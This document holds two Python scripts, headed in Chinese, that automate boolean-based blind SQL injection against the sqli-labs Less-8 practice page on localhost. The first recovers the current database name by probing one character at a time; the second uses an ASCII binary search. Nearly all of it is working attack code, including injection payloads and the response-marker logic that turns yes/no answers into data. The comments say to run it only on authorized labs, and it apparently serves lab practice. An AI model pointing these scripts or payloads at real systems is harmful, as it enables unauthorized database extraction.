方法一(直接使用字符盲注:按位置逐个试探字符集中的字符,每个候选字符一次请求,最坏情况每个位置需要 len(charset) 次请求)
import requests
# Target endpoint. The payload is sent as its `id` query parameter.
# Only run this against a lab instance you own or are authorized to test.
url = "http://127.0.0.1/sqli/Less-8/index.php"
# Accumulator for the recovered name (the functions below build their own
# result and do not touch this).
database_name = ""
# Candidate alphabet, probed in this order for every position; extend it if
# the name may contain other characters. Note the trailing space.
charset = (
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789_-. "
)
#推断数据库名的长度
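def get_database_length(*, max_length=50, timeout=10.0, check=None):
    """Infer len(database()) by probing "length == n" for n = 1..max_length.

    Each probe is one boolean-blind request; the oracle is the presence of
    the Less-8 "true branch" marker in the response body.

    Keyword arguments (all optional, so the original no-arg call still works):
        max_length: largest length tried before giving up. The original loop
            also probed 51 (it incremented before testing its bound); this
            version stops exactly at ``max_length``.
        timeout: per-request timeout in seconds for the default oracle. The
            original sent requests without one, so a stalled target would
            hang the scan indefinitely.
        check: oracle ``(payload: str) -> bool``. Defaults to an HTTP probe
            of the module-level ``url``; injectable so the search logic can
            be exercised without a live target.

    Returns:
        The length as an int, or 0 when no value in 1..max_length matched.
    """
    def _default_check(payload):
        response = requests.get(url, params={"id": payload}, timeout=timeout)
        return "You are in..........." in response.text

    if check is None:
        check = _default_check

    for length in range(1, max_length + 1):
        # Trailing space after "--" is required for a MySQL line comment.
        payload = f"1' AND (SELECT length(database()) = {length}) -- "
        if check(payload):
            return length
    return 0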
#推断数据库名
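def get_database_name(length, *, timeout=10.0, check=None, alphabet=None):
    """Recover database() one position at a time by trying every alphabet entry.

    For position i (1-based, as SUBSTRING counts) each candidate is probed in
    order until the oracle answers True, so the cost is up to
    len(alphabet) requests per position.

    Changes relative to the first version, all interface-compatible:
      * the comparison uses ``BINARY`` so MySQL's default case-insensitive
        collations cannot make 'a' match 'A' (previously the lowercase entry,
        listed first in ``charset``, would win for an uppercase character);
      * the success marker is the same full string the length probe uses;
      * a position with no matching candidate is recorded as ``?`` instead of
        being silently dropped, so the result stays aligned with ``length``;
      * requests carry a timeout.

    Args:
        length: number of characters to recover.
        timeout: per-request timeout in seconds for the default oracle.
        check: oracle ``(payload: str) -> bool``; defaults to an HTTP probe
            of the module-level ``url``. Injectable for offline testing.
        alphabet: candidate characters; defaults to the module-level ``charset``.

    Returns:
        The recovered string, with ``?`` at any unresolved position.
    """
    def _default_check(payload):
        response = requests.get(url, params={"id": payload}, timeout=timeout)
        return "You are in..........." in response.text

    if check is None:
        check = _default_check
    if alphabet is None:
        alphabet = charset

    recovered = []
    for position in range(1, length + 1):
        found = "?"
        for candidate in alphabet:
            payload = (
                f"1' AND (SELECT substring(database(), {position}, 1) "
                f"= BINARY '{candidate}') -- "
            )
            if check(payload):
                found = candidate
                break  # first True answer settles this position
        recovered.append(found)
    return "".join(recovered)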
#主函数
# Script entry point: recover the length first, then the name itself.
if __name__ == "__main__":
    length = get_database_length()
    if not length:
        print("Failed to determine database length.")
    else:
        print(f"Database length: {length}")
        db_name = get_database_name(length)
        print(f"Database name: {db_name}")
方法二(二分查找——用 ASCII() 把字符转为数字后进行盲注:每个字符约 7~8 次请求,并且比较的是精确的码值,不受 MySQL 大小写不敏感排序规则的影响)
import requests
import time
# Target and oracle configuration. Run this only against a lab you own or
# are authorized to test; a full scan issues hundreds of requests.
BASE_URL = "http://127.0.0.1/sqli/Less-8/index.php"
SUCCESS_MESSAGE = "You are in..........."  # text Less-8 prints on the TRUE branch
MAX_LENGTH = 50  # upper bound tried for len(database())
DELAY = 0.1  # seconds slept after every request, to pace the scan
ASCII_MIN, ASCII_MAX = 32, 126  # printable ASCII range: ' ' .. '~'
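def check_injection(url, payload, *, timeout=10.0, retries=2):
    """Send one boolean-blind probe and report whether the injected condition held.

    The oracle is the presence of SUCCESS_MESSAGE in the response body, so
    this only works while the target renders that marker on the "true"
    branch. Relative to the original: a bounded ``timeout`` (there was none,
    so a stalled target could hang the whole scan) and a short retry loop
    for transient transport errors. The interface for existing callers is
    unchanged.

    Args:
        url: target endpoint; ``payload`` is sent as the ``id`` query parameter.
        payload: the SQL fragment to inject.
        timeout: seconds to wait per request.
        retries: additional attempts after a failed request before giving up.

    Returns:
        True when the marker appears in the response, else False.
        NOTE: a request that still fails after all retries is also reported
        as False; the callers' binary searches then read that as "condition
        false" and may converge on a wrong value, so treat any printed
        request error as invalidating the result.
    """
    for attempt in range(retries + 1):
        try:
            response = requests.get(url, params={"id": payload}, timeout=timeout)
        except requests.RequestException as e:
            print(f"请求出错: {e}")
            if attempt < retries:
                time.sleep(DELAY * (attempt + 1))  # back off a little before retrying
            continue
        time.sleep(DELAY)  # pace the scan so the target is not hammered
        return SUCCESS_MESSAGE in response.text
    return False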
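def binary_search(url, payload_template, min_val, max_val, *, check=None):
    """Find the integer in [min_val, max_val] for which the injected condition holds.

    ``payload_template`` must accept ``.format(operator=..., value=...)``;
    only the ``<`` and ``=`` operators are used. Instead of probing both
    ``= mid`` and ``< mid`` on every step, this issues a single ``<`` probe
    per halving plus one final ``=`` probe to confirm the candidate, which
    roughly halves the request count (about 8 instead of up to 14 for the
    printable ASCII range).

    Args:
        url: target endpoint handed to the oracle.
        payload_template: SQL fragment with ``{operator}`` / ``{value}`` slots.
        min_val, max_val: inclusive search bounds.
        check: oracle ``(url, payload) -> bool``; defaults to
            ``check_injection``. Injectable so the search can be unit tested
            without a live target.

    Returns:
        The matching value, or -1 when nothing in range passes the final
        equality probe (value outside the bounds, empty/NULL substring, an
        oracle that answered inconsistently, or an empty range).
    """
    if check is None:
        check = check_injection
    low, high = min_val, max_val
    while low < high:
        mid = (low + high) // 2
        # "value < mid + 1" is "value <= mid": keep the lower half on True.
        if check(url, payload_template.format(operator="<", value=mid + 1)):
            high = mid
        else:
            low = mid + 1
    # low == high is the only candidate left; confirm it explicitly so an
    # out-of-range value is reported as -1 rather than as a bound.
    if low <= high and check(url, payload_template.format(operator="=", value=low)):
        return low
    return -1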
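def get_database_length(url, *, max_length=None, check=None):
    """Find len(database()) with a binary search over 1..max_length.

    One ``<`` probe per halving plus a final ``=`` probe to confirm the
    candidate, instead of two probes per step as in the original; the
    result is identical, the request count is roughly halved.

    Args:
        url: target endpoint.
        max_length: inclusive upper bound; defaults to MAX_LENGTH.
        check: oracle ``(url, payload) -> bool``; defaults to
            ``check_injection``. Injectable for offline testing.

    Returns:
        The length, or 0 when no value in 1..max_length passes the final
        equality probe (name longer than the bound, or an oracle that
        answered inconsistently).
    """
    if max_length is None:
        max_length = MAX_LENGTH
    if check is None:
        check = check_injection
    print("正在获取数据库名长度...")
    low, high = 1, max_length
    while low < high:
        mid = (low + high) // 2
        # "length < mid + 1" is "length <= mid": keep the lower half on True.
        payload_lt = f"1' AND (SELECT length(database()) < {mid + 1}) -- "
        if check(url, payload_lt):
            high = mid
        else:
            low = mid + 1
    payload_eq = f"1' AND (SELECT length(database()) = {low}) -- "
    if low <= high and check(url, payload_eq):
        print(f"数据库名长度: {low}")
        return low
    print("无法确定数据库名长度")
    return 0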
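def get_database_name(url, length):
    """Recover database() character by character via ASCII binary search.

    Each position is resolved with ``binary_search`` over the printable
    ASCII range [ASCII_MIN, ASCII_MAX]. Because the probe compares exact
    ASCII codes, it is not affected by case-insensitive collations the way
    a direct string comparison would be.

    A position the search cannot resolve (``binary_search`` returned -1:
    non-printable or multibyte byte, or an oracle error mid-search) is
    recorded as ``?`` instead of being silently dropped, so the returned
    string stays aligned with ``length`` and the gap is visible.

    Args:
        url: target endpoint.
        length: number of characters to recover (from get_database_length).

    Returns:
        The recovered name, with ``?`` at any unresolved position.
    """
    print("正在获取数据库名...")
    # First format fills {pos}; the doubled braces survive as the
    # {operator}/{value} slots that binary_search fills on every probe.
    payload_template = "1' AND (SELECT ASCII(SUBSTRING(database(), {pos}, 1)) {{operator}} {{value}}) -- "
    db_name = ""
    for pos in range(1, length + 1):
        formatted_template = payload_template.format(pos=pos)
        ascii_code = binary_search(url, formatted_template, ASCII_MIN, ASCII_MAX)
        db_name += chr(ascii_code) if ascii_code != -1 else "?"
        print(f"已获取字符 {pos}/{length}: {db_name}")
    return db_name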
def main():
    """Entry point: recover the current database name from BASE_URL."""
    print(f"开始对 {BASE_URL} 进行SQL注入测试")
    name_len = get_database_length(BASE_URL)
    if name_len > 0:
        print(f"数据库名: {get_database_name(BASE_URL, name_len)}")
        return
    print("无法获取数据库信息,退出")
# Script entry point; nothing runs when the module is merely imported.
if __name__ == "__main__":
    main()